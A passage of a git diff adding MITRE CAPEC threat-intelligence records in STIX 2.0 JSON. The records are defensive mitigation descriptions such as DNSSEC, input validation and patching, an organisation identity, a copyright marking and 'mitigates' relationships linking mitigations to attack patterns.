ebXML, or similar messages that are verifiably signed by a trusted party.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f.json b/capec/course-of-action/course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f.json new file mode 100644 index 0000000000..35c823fd80 --- /dev/null +++ b/capec/course-of-action/course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--089f8ead-097c-4966-b5c4-435b0ad3c32a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f99f5203-29e2-439e-ad52-cd3e9250ec0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-598-3", + "description": "Implementation: DNSSEC", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f.json b/capec/course-of-action/course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f.json new file mode 100644 index 0000000000..41cac1164e --- /dev/null +++ b/capec/course-of-action/course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5597b087-9f73-4c25-aaca-622332077ac5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-158-0", + "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7.json b/capec/course-of-action/course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7.json new file mode 100644 index 0000000000..5ff0e6bcdd --- /dev/null +++ b/capec/course-of-action/course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7ba3b4cd-7f40-4b30-a7bd-c769ba3f4552", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-598-4", + "description": "Implementation: DNS-hold-open", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34.json b/capec/course-of-action/course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34.json new file mode 100644 index 0000000000..db7bece9cc --- /dev/null +++ b/capec/course-of-action/course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--68b23e65-2887-4a1d-8dc5-765c3e0a2d5f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fa5c5206-e8e1-4eac-8f99-b82d51657e34", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-509-0", + "description": "Monitor system and domain logs for abnormal access.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fab76528-99af-4cf9-8786-33b6ca964343.json b/capec/course-of-action/course-of-action--fab76528-99af-4cf9-8786-33b6ca964343.json new file mode 100644 index 0000000000..634a7599ee --- /dev/null +++ b/capec/course-of-action/course-of-action--fab76528-99af-4cf9-8786-33b6ca964343.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1e31fa47-dc76-4c99-a5d9-c056d1c141d0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fab76528-99af-4cf9-8786-33b6ca964343", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-3", + "description": "Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987.json b/capec/course-of-action/course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987.json new file mode 100644 index 0000000000..041848f065 --- /dev/null +++ b/capec/course-of-action/course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--64a9b943-4421-4750-af52-272c571d9d3d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-38-2", + "description": "Implementation: Host integrity monitoring", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f.json b/capec/course-of-action/course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f.json new file mode 100644 index 0000000000..0b7ad77d85 --- /dev/null +++ b/capec/course-of-action/course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8d07be84-0b2b-4860-9904-d462765d0834", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fb62522f-e0fa-456a-b97a-908074721e7f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-4", + "description": "Encrypt and password-protect sensitive data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff.json b/capec/course-of-action/course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff.json new file mode 100644 index 0000000000..f36d449554 --- /dev/null +++ b/capec/course-of-action/course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e1ee5167-7b03-41a8-8632-5cb5414107a8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-3", + "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a.json b/capec/course-of-action/course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a.json new file mode 100644 index 0000000000..8a1acc9c4e --- /dev/null +++ b/capec/course-of-action/course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ffb4bf3e-1914-4885-8a61-2b62e5652f76", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-43-0", + "description": "An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8.json b/capec/course-of-action/course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8.json new file mode 100644 index 0000000000..f2a9232101 --- /dev/null +++ b/capec/course-of-action/course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1e6c9c6d-355f-46cd-becb-d81a3eaa8f3b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-20-0", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b.json b/capec/course-of-action/course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b.json new file mode 100644 index 0000000000..696b271dd4 --- /dev/null +++ b/capec/course-of-action/course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--aec6b335-01c4-41bd-b7ae-1004584f1220", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-01T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-587-0", + "description": "\n Avoid clicking on untrusted links.\n Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4.json b/capec/course-of-action/course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4.json new file mode 100644 index 0000000000..821b8a41b0 --- /dev/null +++ b/capec/course-of-action/course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c2cb57bf-bfcf-41d4-9fa3-d825b0f2b69a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-215-1", + "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab.json b/capec/course-of-action/course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab.json new file mode 100644 index 0000000000..a64ddcb59c --- /dev/null +++ b/capec/course-of-action/course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0ba7593f-4b69-48af-9342-1ea617048387", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-3", + "description": "Curtail unexpected input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111.json b/capec/course-of-action/course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111.json new file mode 100644 index 0000000000..e4395f8e1e --- /dev/null +++ b/capec/course-of-action/course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2d76fb33-f469-4d05-be79-42592217c28a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-7", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c.json b/capec/course-of-action/course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c.json new file mode 100644 index 0000000000..cbda2305b6 --- /dev/null +++ b/capec/course-of-action/course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--10ff1b2f-06f9-42fb-8201-aebdca27a56a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-130-2", + "description": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--fef2690d-0830-4691-a0a7-247db5d61967.json b/capec/course-of-action/course-of-action--fef2690d-0830-4691-a0a7-247db5d61967.json new file mode 100644 index 0000000000..0bc53ffdf3 --- /dev/null +++ b/capec/course-of-action/course-of-action--fef2690d-0830-4691-a0a7-247db5d61967.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--210f759e-a5c3-4592-a839-ec33890e569a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--fef2690d-0830-4691-a0a7-247db5d61967", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-40-0", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03.json b/capec/course-of-action/course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03.json new file mode 100644 index 0000000000..79351ce202 --- /dev/null +++ b/capec/course-of-action/course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4833d98f-0785-4ac1-9e29-366db7372943", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-3", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430.json b/capec/course-of-action/course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430.json new file mode 100644 index 0000000000..f00ece3cf7 --- /dev/null +++ b/capec/course-of-action/course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7ab20985-e218-4e90-ba86-e7e8cfa4de13", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-169-2", + "description": "Change default passwords by choosing strong passwords.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/identity/identity--99e72de9-cd42-43b1-906d-c4f855fd3322.json b/capec/identity/identity--99e72de9-cd42-43b1-906d-c4f855fd3322.json new file mode 100644 index 0000000000..f753be998d --- /dev/null +++ b/capec/identity/identity--99e72de9-cd42-43b1-906d-c4f855fd3322.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--64b1ee1d-3b6c-4f6c-b204-0bc86338e815", + "spec_version": "2.0", + "objects": [ + { + "type": "identity", + "id": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-10-10T18:24:35.929Z", + "modified": "2019-10-10T18:24:35.929Z", + "name": "The MITRE Corporation", + "identity_class": "organization", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/marking-definition/marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89.json b/capec/marking-definition/marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89.json new file mode 100644 index 0000000000..2282440a6f --- /dev/null +++ b/capec/marking-definition/marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89.json @@ -0,0 +1,16 @@ +{ + "type": "bundle", + "id": "bundle--09a51a37-3d37-4bc6-a7cf-ba0fdef25441", + "spec_version": "2.0", + "objects": [ + { + "type": "marking-definition", + "id": "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89", + "created": "2019-10-10T18:24:35.927034Z", + "definition_type": "statement", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright \u00a9 2007 - 2017, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + } + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--006c26af-3692-4dc4-b1a2-5dbf04504a06.json b/capec/relationship/relationship--006c26af-3692-4dc4-b1a2-5dbf04504a06.json new file mode 100644 index 0000000000..fede42c991 --- /dev/null +++ b/capec/relationship/relationship--006c26af-3692-4dc4-b1a2-5dbf04504a06.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--335f840c-eb3f-4d67-bf1f-73f81146a2cc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--006c26af-3692-4dc4-b1a2-5dbf04504a06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--744bb010-978a-4e8c-804f-164adb0bf938", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2.json b/capec/relationship/relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2.json new file mode 100644 index 0000000000..69fa8c85a9 --- /dev/null +++ b/capec/relationship/relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d1c62673-6ee2-4681-af48-dd92478f7969", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54", + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--00b2d802-87bd-4e59-9395-772602c5945b.json b/capec/relationship/relationship--00b2d802-87bd-4e59-9395-772602c5945b.json new file mode 100644 index 0000000000..32cfc7fc6d --- /dev/null +++ b/capec/relationship/relationship--00b2d802-87bd-4e59-9395-772602c5945b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--20767f19-1455-4af4-96a3-a8b2394dac41", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00b2d802-87bd-4e59-9395-772602c5945b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321.json b/capec/relationship/relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321.json new file mode 100644 index 0000000000..d757dbb1a7 --- /dev/null +++ b/capec/relationship/relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--51ccabc7-9185-42aa-b0ae-908c7d278ae9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6.json b/capec/relationship/relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6.json new file mode 100644 index 0000000000..1e72c41466 --- /dev/null +++ b/capec/relationship/relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c92da6d1-bcf3-477e-925e-050ec97dad2a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb8ff861-9a05-4c4d-9add-18fe639752a8", + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb.json b/capec/relationship/relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb.json new file mode 100644 index 0000000000..3fb951f281 --- /dev/null +++ b/capec/relationship/relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--044df1d2-20ac-4a05-96b1-0b4be9afb372", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d", + "target_ref": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919.json b/capec/relationship/relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919.json new file mode 100644 index 0000000000..fedb1cedf1 --- /dev/null +++ b/capec/relationship/relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ae6f32cc-55d1-4b8f-94d0-c944fb65e674", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--0227718a-3bad-415f-b809-f3d03a16b89a.json b/capec/relationship/relationship--0227718a-3bad-415f-b809-f3d03a16b89a.json new file mode 100644 index 0000000000..a34cb22601 --- /dev/null +++ b/capec/relationship/relationship--0227718a-3bad-415f-b809-f3d03a16b89a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c213beec-fcb4-48b4-92db-55274d23f758", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0227718a-3bad-415f-b809-f3d03a16b89a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "target_ref": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--027de0e5-e9fc-416d-befd-217351bd315b.json b/capec/relationship/relationship--027de0e5-e9fc-416d-befd-217351bd315b.json new file mode 100644 index 0000000000..41ca8116a8 --- /dev/null +++ b/capec/relationship/relationship--027de0e5-e9fc-416d-befd-217351bd315b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--34155550-14c7-4d2d-9b57-8e2dde4bb5be", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--027de0e5-e9fc-416d-befd-217351bd315b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + 